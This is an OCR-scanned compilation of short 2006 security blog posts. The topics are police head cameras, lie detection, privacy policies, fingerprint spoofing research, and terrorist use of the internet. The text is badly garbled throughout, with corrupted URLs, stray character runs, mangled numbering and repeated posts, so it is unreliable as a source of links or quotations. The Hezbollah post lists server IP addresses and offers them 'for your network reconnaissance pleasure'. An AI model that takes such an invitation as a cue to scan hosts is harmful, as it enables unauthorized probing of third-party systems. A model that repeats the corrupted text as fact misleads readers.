

"The world draws ever-closer to the dystopia imagined in Hollywood blockbusters - po- 
lice in London are to be equipped with [4]head-mounted cameraswhich will record everything 
in the direction the officer is looking. The tiny cameras are about the size of an AA battery 
and can record images of an extremely high quality. 


Claimed to be a deterrent for anti-social behaviour, the first run of head-cams are being 
tested by eight Metropolitan beat officers this month. If successful, all police officers will 
eventually be equipped with a head camera. 


These new ‘robocops’ add to the growing number of surveillance machines that peer at 
the public. Cynics argue that the logical progression of the police head-cam will be 
head-cameras that all citizens are required to wear. The video data would be relayed 
back to a central database where transgressions are recorded by a computer." 


[5]George Orwell is definitely turning upside down in his grave in the time of writing, 
and it’s entirely up to you to come up with the possible scenarios for abusing this innovation - 
[6]The Final Cut too, has a good perspective. 


Think that’s not enough to raise your eyebrows? [7]British Telecom is also about to “put 
thousands of spy camera recorders in its phone boxes and beam suspects mugshots 
to police. Cameras stationed on top of lampposts near the kiosks will send images 
to hidden digital video recorders inside the booths. Suspects photos will then be mes- 
saged almost instantly to hand-held digital assistants used by police and emergency services." 


Issues to keep in mind: 

- No more tax payers’ money wasted on CCTVs to only cover the blind spots introduced by the 
old ones, now you have the "walking CCTVs" taking care 

- Face and voice recognition, as well as parabolic type of remote listening capabilities will be 
the next milestones to reach 

- Data collected would prove invaluable to ongoing investigations, and you know, "computers 
never lie" so digitally introducing minor motives here and there becomes a handy weakness 

- More entertaining reality shows will follow for the purpose of communicating the value of the 
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cameras to the general public 
- Someone will sooner or later find a way to jam the stream 


O wien ee = 


a+ Saueg-Fonee- 


= r= There’s a saying about not looking anyone straight into 
the eyes on the mean streets of New York, guess the same applies to not looking straight 
into the eyes of London’s police anymore. [9]Every country needs an [10]EFF of its own, 
[11]especially the U.K these days. To illustrate what | have in mind, [12]EPIC’s listing the U.K 
at the top of the leading EU surveillance societies, and you may also find the [13]U.K’s opinion 
on its state of total surveillance, informative as well. 


Finger-mounted keyboard chick courtesy of [14]Kittytech. 


1. http: //erave. cnet. co, uk/cancorders/0, 59099423, 49265905, 00 ha 
2. http: //crave. cnet .co.uk/camcorders/0 , 39029423 , 49285395, 00. htm 
3, http: //del. icio.ue/DDanchev/Privacy 
4. http: //www.egovmonitor . com/node/8662 
5. 


ttp://en.wikipedia.org/wiki/Nineteen_Eighty-Fou 


6 
7. bttp://www.mirror.co.uk/news/tm_headline=eye-spy-in-every-bt- phone-box-&method=full&objectid=18123366&sit 
8. 

9. 

10, 

11. 


12. http://www.privacyinternational.org/article.shtml1?cmd/5B3477,5D=x- 347- 54522 


. http://www.ico.gov.uk/upload/documents/library/data_protection/practical_application/surveillance_societ 


full_report_2006. pdf 
14. http://www.kittytech.com/ 


2.11.13 How to Tell if Someone’s Lying to You (2006-11-27 04:31) 


[1] Stop whispering = my ear, it tickles Interactive slideshow providing ten tips on how to tell if some- 
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one’s lying to you. These can of course be interpreted in different ways and applied under 
specific circumstances only. Some are very practical though : 


01. Watch Body Language 

02. Seek Detail 

03. Beware Unpleasantness 

04. Observe Eye Contact 

05. Signs of Stress 

06. Listen for the Pause 

07. Ask Again 

08. Beware Those Who Protest Too Much 
09. Know Thyself 

10. Work on Your Intuition 


Two more | can add - answering without being asked, and on purposely stating the 
possibility as a negative statement already. Here’s [2]the article itself, as well as several 
more [3]handy tips on [4]detecting lies. Don’t forget - if someone’s being too nice with you, it 
means they’re beating you already. 


Ear whisper courtesy of [5]Cartoonstock.com 


1. http://www. forbes .com/2006/11/02/tech-cx_ee_technology_liar_slide.html?boxes=custo 

2. http://www.forbes.com/technology/2006/11/03/detecting-lies-trust-tech_O6trust_cx_ee_1103lies.htm 
3 

‘ 

5 


2.11.14 To Publish a Privacy Policy or Not to Publish a Privacy Policy (2006-11-27 04:45) 


[1] Ledal Here’s an article arguing that "[2]publishing a privacy state- 


ment may be more harmful than not publishing one"only if enforcement, implementation and 
monitoring don’t intersect as they should : 


"This case demonstrates a complication relating to companies’ claiming that they have 
security measures to protect their end users’ privacy. Large, established companies, like 
Eli Lilly, understand this issue but may still have problems ensuring compliance to their 
privacy policy. But many emerging companies immediately post their claimed privacy 
policies on their company websites. These companies often fail to assess the 
potential risks, burdens and liabilities associated with publishing a privacy policy. 
They do not realize that publishing a privacy statement may be more harmful than 
not publishing one." 


Privacy exposure assessments still remain rather unpopular among leading companies, 
and compliance with industry specific requirements for processing and storing personal 
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information continue indirectly replacing what a Chief Privacy Officer would have done in 
a much more adaptive manner. Can we that easily talk about Total Privacy Management 
(TPM), the way talk about Total Quality Management (TQM) as an internal key objective for 
strengthening a company’s reputation as a socially-oriented one? It would definitely turn 
into a criteria for the stakeholders, and a differentiating point for any company in question in 
the long term. [3]The future of privacy? [4]Don’t over-empower the watchers or you'll have 
the entire data aggregation model of our society used [5]Jagainst your rights for the sake of 
protecting you from "the enemy or the threat of the day”. 


You may also find some comments from a previous post on "[6]JExamining Internet Pri- 
vacy Policies" relevant to the topic : 


"Accountability, public commitment, or copywriters charging per word, privacy policies 
are often taken for fully enforced ones, whereas the truth is that actually no one is reading, 
bothering to assess them. And why would you, as by the time you've finished you’ll again 
have no other choice but to accept them in order to use the service in question - too much 
personal and sensitive identifying information is what | hear ticking. That’s of course the 
privacy conscious perspective, and to me security is a matter of viewpoint, the way you 
perceive it going beyond the basics, the very same way you're going to implement it - Identity 
2.0 as a Single sign on Web is slowly emerging as the real beast." 


http: //photos1. blogger. com/blogger2/4099/2257/1600/brainwashing. jpg 
ttp://www.csoonline.com/caveat/092506.htm 
ttp://ddanchev. blogspot .com/2006/03/future-of-privacy-dont-over-empower .htm 


1. 
2. 
3. 
4. http: //ddanchev. blogspot .com/2006/03/data-mining-terrorism-and-security.htm 
5 
6 


ttp://ddanchev. blogspot .com/2006/03/security-vs-privacy-or-whats-left-from.htm 


ttp://ddanchev. blogspot .com/2006/09/examining-internet-privacy-policies.htm 


2.11.15 Global Map of Security Incidents and Terrorist Events (2006-11-27 05:39) 


[1] * Outstanding project demonstrating [2]the benefits of open source intelligence posi- 
tioned on Google Maps while providing you with the very latest global security and suspicious 
events in categories such as : 


- Airport/Aviation Incidents 

- Arson/Fire Incidents 

- Biological Incidents/ Threats/ Anthrax Hoaxes etc 
- Bomb Incidents/Explosives/ Hoax Devices 

- Chemical Incident 

- Dam Incident 

- Radiation Incidents/ Smuggling/ Proliferation 

- Chemical Attack 

- Other Suspicious Activity 

- Shipping/Maritime/Ports/Cargo/Waterways Security 
- Assassination/ Assassination Attempt 

660 


- Railways/Train Stations 

- Bus Stations/ Bus Security/ Bus Related Incidents 

- Bridge / Tunnel Incidents and Security 

- Shootings / Sniper Incidents/ Etc 

- Terrorist Arrests/Captured/Killed Locations 

No more "slicing the threat on pieces", now you can see the big picture for yourself. 


1. http://www. globalincidentmap.com/home. php 
2. http: //ddanchev. blogspot . com/2006/09/benefits-of-open-source-intelligence.htm 


2.11.16 How to Fake Fingerprints (2006-11-27 06:24) 


[1] * With all the buzz of [2]fingerprinting this and [3]that, fingerprint these [4]instructions 
on how copy and fake fingerprints : 


"In order to fake a fingerprint, one needs an original first. Latent fingerprints are noth- 
ing but fat and sweat on touched items. Thus to retrieve someone elses fingerprint (in this 
case the fingerprint you want to forge) one should rely on well tested forensic research 
methods. Which is what’s to be explained here." 


Bow to the CCC’s full disclosure shedding more light on a common sense insecurity. While 
it can be tackled by both ensuring the quality of the fingerprinting process, and by techno- 
logical means such as adding extra layers or cross-referencing through different databases, 
multiple-factor authentication’s benefits are proportional with their immaturity and usability 
issues. Fancy? For sure. Cutting-edge security? Absolutely from a technological point of 
view. But when fingerprints start getting more empowerment and integration within our daily 
lifes, malicious parties would have already taken notice, and again be a step ahead of the 
technological bias on fingerprinting. Coming up with new identities may indeed end up as a 
commodity neatly stored in a central database, or perhaps ones collected from elsewhere. 


1. http://photos1.blogger .com/x/blogger2/4099/2257/1600/697161/small_06-finger+nachbearbeiten. png 
2. http: //ddanchev. blogspot .com/2006/10/surveillane-system-about-to-get .htm 


3. http: //www.telegraph.co.uk/news/main. jhtm1?xml=/news/2006/11/22/ufingers122.xm 


4. http://www.ccc.de/biometrie/fingerabdruck_kopieren.xml?language=e 


2.11.17 Video of Birds Attacking an Unmanned Aerial Vehicle (UAV) (2006-11-29 17:13) 


1) = aes Mother Nature on the basics of asymmetric warfare : 
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"However, on one flight, a test Raven attracted the attention of two nearby crows, who initially 
squawked a territorial warning at the UAV. Unsuprisingly undeterred by the warnings, the UAVs 
carried on on their descent and were subsequently attacked by the crows. See the video clip 
below. 


The UAVs were required to remain at low altitude for the duration of each sortie, airspace above 
the city forming part of the western approaches to Brisbane International airport." 


And no, don’t even think on [2]speculating of [3]terrorists training divisions of crows to attack, 
or early warn of UAVs flying around the birds’ air space, unless of course your wild imagination 
prevails. 


1 
attack+Aerovironment+RaventUAV+onttest+flighttover.ht 

2. 

3. 


2.11.18 CIA Personality Quiz (2006-11-29 17:28) 


[1] * Animpressive mastermind is what | got as a type of personality, quite a bit of suspicious 
flattery isn’t it? 


| feel [2]the quiz is more of an ice-breaker, and it’s hell of an amusing one as a matter 
of fact. Hint to the CIA’s HR department - promise to show the ones who make it up for a 
final interview a randomly chosen [3]analyst’s collection of secret UFO files, and see your 
conversion rates skyrocketing. Then explain them the basics of access programs based on 
classification and why they have to perform better. Arbeit macht access to secret UFO files as 
a factor for productivity, cute. 


More comments from another wannabe [4]secret AGent. 


1 ft ip: //photost. blogger con/s/blogger/4000/2067/1600/292406/astoraind. jpg 
2. heeps://wuv. cia. gov/careors/CLAKyths. nea 

3. http: //ddanchev. blogspot .com/2006/08/analyzing-intelligence-analysts html 
4. netp://ologs.usatoday .on/ techspace/2006/11/secret_agent. neal 


2.11.19 A Movie About Trusted Computing (2006-11-30 18:10) 


low MID HIGH 
[1] = Great [2]opinionated introduction to the [3]topic. Trusted com- 
puting isn’t the panacea of total security simply because [4]there can never be 100 % secure 
OS or a device, unless of course you put so much security layers in place to end up with zero 
usability, so what’s it gonna be? Insecurities are a commodity, but security and usability issues 
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are always a matter of viewpoint, so don’t act as if you can provide 100 % security, because 
what you’re actually offering is a marginal thinking while proposing a solution. 


1. http://photos1. blogger .com/x/blogger2/4099/2257/1600/395049/trusted_computing. jpg 
2. http://www.lafkon.net/tc/ 


3. http://en.wikipedia. org/wiki/Trusted_computing 


4. http://www.securityabsurdity.com/failure.php 


2.11.20 A Chart of Personal Data Security Breaches 2005-2006 (2006-11-30 18:31) 


he a Following my previous post on "[2]Personal Data Security 
Breaches - 2000/2005", you may also find this "[3]Chart of Security Breaches for 2005 - 2006" 
worth taking a look at - lost or stolen equipment with data dominate the threatscape. 


With the eye-popping big bubbles, and hundreds of thousands of people exposed due to the 
centralized and insecure nature of storing and processing their information, ask yourself why 
would an attacker ever bother to initiate a network level attack against a data aggregator 
nowadays? Consider the other perspective when it comes to data security breaches, namely 
"[4]To report, or not to report?" a breach, and how is an organization supposed to report when 
they’re not ever aware that personal information has already been exposed. 


Take your time to go through a very good resource keeping track of [5]Jall reported data security 
breaches and notice the most common patterns for yourself. 


1. http://photos1.blogger .com/x/blogger2/4099/2257/1600/431813/chart_breaches. jpg 
2. http: //ddanchev. blogspot .com/2006/01/personal-data-security-breaches.htm 
3. 


ttp://www. consumerist .com/consumer/identity-theft/pictorial-guide-to-this-year-in-personal-id-breaches-2 


14860. php 
4. http://ddanchev. blogspot .com/2006/01/to-report-or-not-to-report.htm 
5. http: //www.numbrx.net/ 
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2.12 December 


2.12.1 Symantec’s Invisible Burglar Game (2006-12-07 15:45) 


WELL DONE!! 


YOU HAVE SUCCESSFULLY PROTECTED 
YOUR DIGITAL PHOTOS FROM THE 
INVISIBLE BURGLAR 


Cheers to Symantec’s PR folks for coming up with such an [1]entertaining promotion of Norton 
360, so that "if everything gets too much hit the spacebar to activate the Norton 360 force 
field to destroy everything in sight." 


Good one! 
Try the infamous [2]Airport security flash game too, and search everyone for exploding 


toothpastes, and other dangerous substances as they become dangerous throughout the 
game. 


1. http: //www.symantec.com/invisibleburgla 
2. http: //ddanchev. blogspot .com/2006/09/airport-security-flash-game.htm 


2.12.2 Symantec’s Invisible Burglar Game (2006-12-07 16:46) 


[1] * Cheers to Symantec’s PR folks for coming up with such an [2]entertaining promotion of 
Norton 360, so that "/f everything gets too much hit the spacebar to activate the Norton 360 
force field to destroy everything in sight." 


Good one! 
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Try the infamous [3]Airport security flash game 
too, and search everyone for exploding toothpastes, and other dangerous 
substances as they become dangerous throughout the game. 


https: //web.archive.org/web/20101016192214/http://4.bp.blogspot .com/_wICHhTiQmrA/RXgbS9wuj AI /AAAAAAAAAR4/1 


g6_u0K1FAo/s1600-h/mission1. jpg 
2. http://www.symantec.com/invisibleburgla 
3. http://ddanchev. blogspot .com/2006/09/airport-security-flash-game.htm 


H 


2.12.3 Censoring Seductive Child Behaviour (2006-12-08 02:46) 


HEY EVERYBODY/ DON'T LOOK AT THIS! IT'S REALLY 
OFFENSIVE! WOW! THAT IS SOOO OFFENSIVE! THERE 
IS NO WAY YOU SHOULD LOOK AT THIS THING THAT 
YOU PROBABLY WOULDN'T NORMALLY THINK OF 
LOOKING AT ANYWAY! YOU WOULDN'T BELIEVE IT, 
BUT DON’T LOOK!s 


| Ke me 


[1]define:seductive 
[2]define:unaware 
[3]define:immature 
[4]define:maturing 


"Covert pedophilia in the Victorian society". Is that a good line, or is that a good line? 
[5]Censorship as a matter of viewpoint - as of recently Globe and Mail want you to purchase 
the article without realizing the click-through rates for both, Doubleclick serving the ads at 
their site and them, if it were distributing it for free, but anyway [6]guess they should have 
told Google either : 


"The Legards’ central thesis is that the debate over children and sexual imagery has 
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been dominated and distorted by two opposing myths: one is "the quasi-religious conception 
of childhood innocence," which involves "the irrational denial of childhood sexuality"; the other 
is "the ideology" of the artist as someone "possessing mystical abilities and unique rights" 
that should not be constrained by the state." 


After [7]thoughtcrime and intention-crime policing, it’s about time behaviour-policing starts 
taking place, now wouldn’t that be truly outrageous? Something no one is again going to do 
anything about, thinking he’s either the only one seeing it, or perhaps prefers to keep playing 
in his own corner? 


Anyway, discussions like these should only happen after the real problem, with real child porn 
online gets solved. And that wouldn’t happen by fighting the distribution channels as they’re 
too many to control and police, but by making sure the production stage never happens at the 
first place. 


Another article on the topic "[8]Clothed Child Porn Online?". By the way, are you finally 
seduced now? A rocket scientist doesn’t seem to be, throughout the "[9]decade of dedicating 
downloading". Such a collection can now definitely acts as a new [10]digitally fingerprinted 
database to [11]keep track of. 


1. http://w google. con/search?blmentqndefineZahseductive 
2. http://www. google. com/search?hl=enklr=&q=def ine/,3Aunaware 

3, heep: //w. google. con/search?hl-entqndef ine/9kimnature 

4, http://www, google, con/osarch?tl-eukq-definelinaturd 

5. http://www. theglobeandnail.con/servlet/story/RTGAN, 20051127 wxblackflaahl/BIStory/Extertainent hone 
6. 


ttp://209.85.135.104/search?q=cache : kgSMhbORWEsJ : www. theglobeandmail.com/servlet/story/RTIGAM. 20061127 .wxb 


lackflash27/BNStory/Entertainment/t+Istit+child+pornt+to 


7. http: //en.wikipedia. org/wiki/thoughtcrime 
8. http://www. redherring.com/Article.aspx?a=1997 2k&hed=Clothed+Child+Porn+Online/3 


9. http: //breakingnews.iol.ie/news/story.asp? j=202611410&p=zxz6yzyy6 


10. http://www.theregister.co.uk/2006/06/28/isps_illegal_image_crackdown/ 
11. http://www.theregister.co.uk/2003/04/14/us_gov_builds_huge_child/ 


2.12.4 Censoring Seductive Child Behaviour (2006-12-08 16:50) 


[1] *™ [2]define:seductive 


[3]define:unaware 
[4]define:immature 


[5]define:maturing 


"Covert pedophilia in the Victorian society". Is that a good line, or is that a good line? 
[6]Censorship as a matter of viewpoint 
- as of recently Globe and Mail want you to purchase the article 
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without realizing the click-through rates for both, Doubleclick serving 
the ads at their site and them, if it were distributing it for free, but 
anyway [7]guess they should have told Google either : 


"The 

Legards’ central thesis is that the debate over children and sexual 
imagery has been dominated and distorted by two opposing myths: one is 
"the quasi-religious conception of childhood innocence," which involves 
"the irrational denial of childhood sexuality", the other is "the 

ideology" of the artist as someone "possessing mystical abilities and 
unique rights" that should not be constrained by the state." 


After [8]thoughtcrime 

and intention-crime policing, it’s about time behaviour-policing starts 
taking place, now wouldn’t that be truly outrageous? Something no one 
is again going to do anything about, thinking he’s either the only one 
seeing it, or perhaps prefers to keep playing in his own corner? 


Anyway, 

discussions like these should only happen after the real problem, with 
real child porn online gets solved. And that wouldn’t happen by fighting 
the distribution channels as they’re too many to control and police, 

but by making sure the production stage never happens at the first 
place. 


Another article on the topic "[9]Clothed Child Porn Online?". By the way, are you finally 
seduced now? A rocket scientist doesn’t seem to be, throughout the "[10]decade of dedicating 
downloading". Such a collection can now definitely acts as a new [11]digitally fingerprinted 
database to [12]keep track of. 


ttps://web.archive.org/web/20101016192214/http://2.bp.blogspot.com/_wICHhTiQmrA/RXjDMdwujFI/AAAAAAAAAFO/ 


ime ae h/censorship_southpark. jpg 


ttp://www.google.com/search?hl=enkq=def ine/3Aseductive 


ttp://www.google.com/search?hl=enklr=&q=def ine/3Aunaware 


4. http://www. google.com/search?hl=enkq=def ine/3Aimmature 
7 


ttp://www.theglobeandmail.com/servlet/story/RTGAM. 20061127 .wxblackflash27/BNStory/Entertainment/home 


ttp://209.85.135.104/search?q=cache :kgSMhbORWEsJ : www. theglobeandmail .com/servlet/story/RTGAM.20061127 .wxb 


ackflash27/BNStory/Entertainment/+Is+it+childtpornto 
ttp://en.wikipedia. org/wiki/thoughtcrime 


ttp://www.redherring.com/Article.aspx?a=1997 2khed=Clothed+Child+Porn+Online/3 


2. 
3 
5. http://www. google. com/search?hl=enkq=def ine/3Amature 
6. 
] 


. ttp://breakingnews.iol.ie/news/story.asp? j=202611410&p=zxz6yzyy6 
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11. http://www.theregister.co.uk/2006/06/28/isps_illegal_image_crackdown/ 
12. http://www.theregister.co.uk/2003/04/14/us_gov_builds_huge_child/ 


2.12.5 Current State of Internet Jihad (2006-12-10 16:52) 


[1] * Very 

good article on various geopolitical issues related to the Middle East 

vs the West, and most importantly an overview of the [2]current state of online jihad. 
Excluding webcasts, video howto’s, and video games as a commodity in 

the big picture, what’s left at the bottom line is easily accessible 

open source intelligence, and tactical warfare practices such as this 

one: 


"Some of the techniques of evasion are disarmingly 

simple. Rather than send emails, some jihadists simply write and save 
draft emails, storing them in an account with a password that’s known to 
other members of the cell. Because they are never actually sent, they 
can’t be detected by intelligence agencies." 


Can you 

intercept an email that’s never been sent? And what if a legitimate 
user’s account end up as a dead box? Moreover, the article points out to 
the recently released [3]Technical Mujahid magazine : 


"Raisman 

points to a recent publication by the al-Fajr group, another 
communications arm of al-Qaeda and its fellow travellers. He said it 
contained a very sophisticated manual on internet security, how to avoid 
hackers, secure personal files and ensure any computer that is captured 
is of little value to Western authorities." 


Going through 

the magazine itself as | indeed obtained a copy and will publish a 
summary of it anytime now, there’s nothing really that very 
sophisticated to be afraid of, unless you know nothing about installing a 
virtual machine, or what triangulation is all about. 
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A handy summary of the article and things to keep in mind : 


- There are over 5000 militant Islamic websites, up from less than a dozen in 1998 - 
these are only the static ones compared to hundreds more temporary campaign ones 


They are an extremely effective way for terrorist groups to plan 

operations, recruit followers, raise funds and distribute propaganda - centralization 
of forces and services is exactly what a terrorist organization isn’t 

into. Diversification and autonomous management for the sake of 

improving the continuity of the site in operation is what really matter, 

namely you'll have the propaganda platform spreading online details on 

how to donate cash on a site that’s been set up for this purpose only. 

By the time there’s been a leak in the "good guys" [4]covert competitive intelligence efforts, 
the donation site will dissapear and reappear somewhere else, while the 

central propaganda platform remains fully active. Take the other 

perspective, if the "bad guys" are aware the "good guys" are reading, 

they may logically leave a decoy to later on analyze how it’s being 

processed and disinform on what may seem a very decent first-hand 

information gathered through open source intelligence. 


Their mastery of the web could extend to cyber-terrorism, such as 

disabling the communication systems that underpin key sectors such as 

banking and energy - any government’s single biggest mistake is [5]stereotyping about cy- 
berterrorism, namely that it’s the [6Joffensive use of cyberterrorism to worry about, whereas 
the defensive, or passive concepts are already maturing. 


- Western agencies are almost powerless to stop the jihadists’ internet activities - of 
course they aren’t, and stopping compared to monitoring is totally 

wrong, the enemy’s location you know is better than the enemy’s location 

you don’t know. 


- Western governments have been very slow to 

respond and are only now turning their attention to combating the 
potent "story" promulgated over the internet - they 

wouldn’t be that very slow in responding if they actually knew how many 
people read and got brainwashed by it, thus what conversion rate can we 
talk about from a reader, to collaborator, to wannabe terrorist, come up 
with metrics and raise eyebrows. 
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1. https://web.archive.org/web/20101016192214/http://3.bp.blogspot .com/_wICHhTiQmrA/RXxcttwujGI/AAAAAAAAAGE/z 


X2Qao001y8/s1600-h/jihad_for_dummies. jpg 


2. http://www.smh.com.au/news/world/fighting- jihad-in-cyberspace/2006/12/01/1164777791383.htm1?page=fullpage 


#contentSwap1 


3. http://siteinstitute.org/bin/articles.cgi?ID=publications229606&Category=publications&Subcategory= 


4. http: //ddanchev. blogspot .com/2006/05/covert-competitive-intelligence htm 
5. http: //ddanchev. blogspot .com/2005/12/cyberterrorism-dont-stereotype-and-its.htm 
6. 


ttp://ddanchev. blogspot .com/2006/10/scada-security-incidents-and-critical.htm 


2.12.6 Digital Terrorism and Hate 2006 CD-ROM (2006-12-10 16:53) 


[1] * In some of my previous investigative posts "[2]Tracking Down Internet Terrorist Pro- 
paganda", "[3]Arabic Extremist Group Forum Messages’ Characteristics", "[4]Cyber Terrorism 
Communications and Propaganda", "[5]Steganography and Cyber Terrorism Communications", 
"T6]A Cost-Benefit Analysis of Cyber Terrorism", | extensively blogged about Cyberterrorism 
and emphasized on the defensive use of it, communication channels under [7]the shadow of 
SCADA devices and critical infrastructure getting attacked. Perspectives like these often [8]ruin 
someone's self-mythology, but [9]the Pupper Master too made a point when saying that your 
desire to remain what you’re is what limits you, so evolve, or end up on the verge of extinction. 


Here’s a little [10]something for everyone thinking [11]cyberterrorism is surreal. Consid- 
ering for a while that even primitive forms of existence such as [12]street gangs utilize 
the [13]Internet for propaganda, wouldn’t a much better financed terrorist organization be 
compelled to participate? In fact they’ve been doing so [14]even before 9/11, but | feel it’s 
the good guys’ cavalier attitude that ended up in the now, mature cyberterrorism platform. 


A great source for [15]open source intelligence to anyone interested in, here’s a sum- 
Mary : 


"This 

sixth and newest version of the Simon Wiesenthal Center’s annual report 
of problematic websites exposes the growing use of the Internet as a 

key propaganda weapon, marketing tool and fundraising engine by 
terrorist groups such as Al Qaeda and Hamas, in addition to its 
continuing assessment of traditional extremist groups such as the KKK 
and neo-Nazis. "Although they swear to destroy the West, extremists and 
terrorists have taken to using Western technology to recruit, finance 

and plan their insidious actions," said Mark Weitzman, Director of the 
Simon Wiesenthal Center’s Task Force Against Hate." 
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Now what 

would an intelligence agency do when knowing exactly where to look? 

Shut them down and prosecute someone, or adapt deep within the community 

to [16]gather as much OSINT as possible. Whatever the outcome, keep in mind on the 
possibility of indirect intelligence engineering, as the way you’re watching them, the same 
way they’re watching you, watching them. 


ttps://web.archive. hacer eee eee //2.bp.blogspot .com/_wICHhTiQmrA/RXiZAdwujDI/AAAAAAAAAFc/ 


ttp://www.toolsfortolerance.com/site/c.pwKOJ8NSJrF/b.1486519/k.DC80/Digital_Terrorism_and_Hate_2006.ht 
cep: / aol eto ua/Wancher/Cyberverroriad 
. http: //www.msnbc .msn. com/id/11675822/site/newsweek/ 
. http://www. zone-h. org/content/view/13834/30/ 
_hetp://awshaganah.org./narchives 006680 tl 
sep: //adaachev blogspot on/2006/09 cyber anvat Tigancer Gfearint tal 
_hvtp://wwsvashingtontines con/ commentary /20061007-104916-2666r htm 


0") oy Le 
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2.12.7 Full List of Hezbollah’s Internet Sites (2006-12-10 16:55) 


[1] * Some of [2]the propaganda is so catchy it can easily compete with the [3]Soviet propa- 
ganda posters during the Cold War visualizing the evil forces from their point of view. Great 
case studies on [4]Internet psychological operations, and Hezbollah’s understanding of [5]Cy- 
berterrorism. 


Here’s a list of the URLs mentioned : 
moqawama.org 

moqawama.tv 

ghaliboun.net 

hizbollah.org 

nasrollah.org 


hizbollah.tv 
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moqawama. info 
moqawama.net 
moqawama.org 
mogavemat.com 
mogavemat.ir 
shiaweb.org 
manartv.com.I|b 
almanar.com.|b 
islamicdigest.net 
manartv.com.I|b 
al-nour.net 
intiqadonline.com 
alintiqad.com 
alahed.org 
wa3ad.org 
islamicdigest.net 
somod.org 
bintjbeil.com 
altaybeh.net 
deirqanounalnahr.jeeran.com 
alshahid.org 
almahdiscouts.org 
jihadbinaa.org 
samirkuntar.org 


groups.msn.com/justiciadivinavenezuela 
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es.groups.yahoo.com/group/Hezboallah _latino 
groups.msn.com/autonomiaislamicawayuu 
groups.msn.com/Hezbollahelsalvador 


hezboallahpartidoislamico.blogspot.es 


And the IPs for your network reconnaissance pleasure : 


82.137.205.249 


82.137.205.247 


202.75.42.155 


205.178.189.131 


216.21.229.196 


202.71.104.241 


209.85.5.112 


203.121.71.217 


82.137.205.249 


82.137.205.249 


69.10.136.210 


207.44.244.117 


66.98.225.220 


209.172.35.181 


209.85.5.113 


208.64.28.10 


66.199.236.147 


673 


Related posts: 
[6]Analysis of the Technical Mujahid Magazine - Issue One 
[7]Hezbollah’s DNS Service Providers from 1998 to 2006 


[8]Hezbollah’s use of Unmanned Aerial Vehicles - UAVs 


1. https://web.archive.org/web/20101016192214/http://4.bp. blogspot .com/_wICHhTiQmrA/RXiRt 9wujBI/AAAAAAAAAFE/k 


fs7YRgQbo/s1600-h/Reload. jpg 


ttp://www.terrorism-info.org.il/malam_multimedia/Hebrew/heb_n/html/hezbollah_int .htm 


. http: //ddanchev. blogspot .com/2006/09/soviet-propaganda-posters-during-cold.htm 


. http: //ddanchev. blogspot .com/2006/09/internet-psyops-psychological.htm 


. http: //del.icio.us/DDanchev/Cyberterrorism 
ttp://ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one. html 


. http: //ddanchev. blogspot .com/2006/09/hezbollahs-dns- service-providers-from.htm 


ONAURWHDN 


. http: //ddanchev. blogspot .com/2006/09/hezbollahs-use-of-unmanned-aerial.htm 


2.12.8 Current State of Internet Jihad (2006-12-10 21:11) 


Very good article on various geopolitical issues related to the Middle East vs the West, and 
most importantly an overview of the [1]current state of online jihad. Excluding webcasts, 
video howto’s, and video games as a commodity in the big picture, what’s left at the bottom 
line is easily accessible open source intelligence, and tactical warfare practices such as this 
one: 


"Some of the techniques of evasion are disarmingly simple. Rather than send emails, 
some jihadists simply write and save draft emails, storing them in an account with a password 
that’s known to other members of the cell. Because they are never actually sent, they can’t 
be detected by intelligence agencies." 


Can you intercept an email that’s never been sent? And what if a legitimate user’s ac- 
count end up as a dead box? Moreover, the article points out to the recently released 
[2]Technical Mujahid magazine : 


"Raisman points to a recent publication by the al-Fajr group, another communications 
arm of al-Qaeda and its fellow travellers. He said it contained a very sophisticated manual on 
internet security, how to avoid hackers, secure personal files and ensure any computer that 
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is captured is of little value to Western authorities." 


Going through the magazine itself as | indeed obtained a copy and will publish a sum- 
mary of it anytime now, there’s nothing really that very sophisticated to be afraid of, unless 
you know nothing about installing a virtual machine, or what triangulation is all about. 


A handy summary of the article and things to keep in mind : 


- There are over 5000 militant Islamic websites, up from less than a dozen in 1998 - 
these are only the static ones compared to hundreds more temporary campaign ones 


- They are an extremely effective way for terrorist groups to plan operations, recruit fol- 
lowers, raise funds and distribute propaganda - centralization of forces and services is exactly 
what a terrorist organization isn’t into. Diversification and autonomous management for the 
sake of improving the continuity of the site in operation is what really matter, namely you'll 
have the propaganda platform spreading online details on how to donate cash on a site that’s 
been set up for this purpose only. By the time there’s been a leak in the "good guys" [3]covert 
competitive intelligence efforts, the donation site will dissapear and reappear somewhere 
else, while the central propaganda platform remains fully active. Take the other perspective, 
if the "bad guys" are aware the "good guys" are reading, they may logically leave a decoy 
to later on analyze how it’s being processed and disinform on what may seem a very decent 
first-hand information gathered through open source intelligence. 


- Their mastery of the web could extend to cyber-terrorism, such as disabling the communica- 
tion systems that underpin key sectors such as banking and energy - any government’s single 
biggest mistake is [4]stereotyping about cyberterrorism, namely that it’s the [5]offensive use 
of cyberterrorism to worry about, whereas the defensive, or passive concepts are already 
maturing. 


- Western agencies are almost powerless to stop the jihadists’ internet activities - of course 
they aren’t, and stopping compared to monitoring is totally wrong, the enemy’s location you 
know is better than the enemy’s location you don’t know. 


- Western governments have been very slow to respond and are only now turning their 
attention to combating the potent "story" promulgated over the internet - they wouldn’t be 
that very slow in responding if they actually knew how many people read and got brainwashed 
by it, thus what conversion rate can we talk about from a reader, to collaborator, to wannabe 
terrorist, come up with metrics and raise eyebrows. 


1. bttp://www.smh.com.au/news/world/fighting- jihad-in-cyberspace/2006/12/01/1164777791383 .html?page=fullpage 


#contentSwap1 


2. http://siteinstitute.org/bin/articles.cgi?ID=publications229606&Category=publications&Subcategory= 


3. http: //ddanchev. blogspot .com/2006/05/covert-competitive-intelligence.htm 
4. http://ddanchev. blogspot .com/2005/12/cyberterrorism-dont-stereotype-and-its.htm 


5. http: //ddanchev.blogspot.com/2006/10/scada-security-incidents-and-critical.htm 
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2.12.9 Digital Terrorism and Hate 2006 CD-ROM (2006-12-11 00:38) 


ky, RO a5 1 


wy I 


In some of my previous investigative posts "[1]Tracking Down Internet Terrorist Propaganda", 
"[2]Arabic Extremist Group Forum Messages’ Characteristics", "[3]Cyber Terrorism Commu- 
nications and Propaganda", "[4]Steganography and Cyber Terrorism Communications", "[5]A 
Cost-Benefit Analysis of Cyber Terrorism", | extensively blogged about Cyberterrorism and em- 
phasized on the defensive use of it, communication channels under [6]the shadow of SCADA 
devices and critical infrastructure getting attacked. Perspectives like these often [7]ruin 
someone’s self-mythology, but [8]the Pupper Master too made a point when saying that your 
desire to remain what you’re is what limits you, so evolve, or end up on the verge of extinction. 


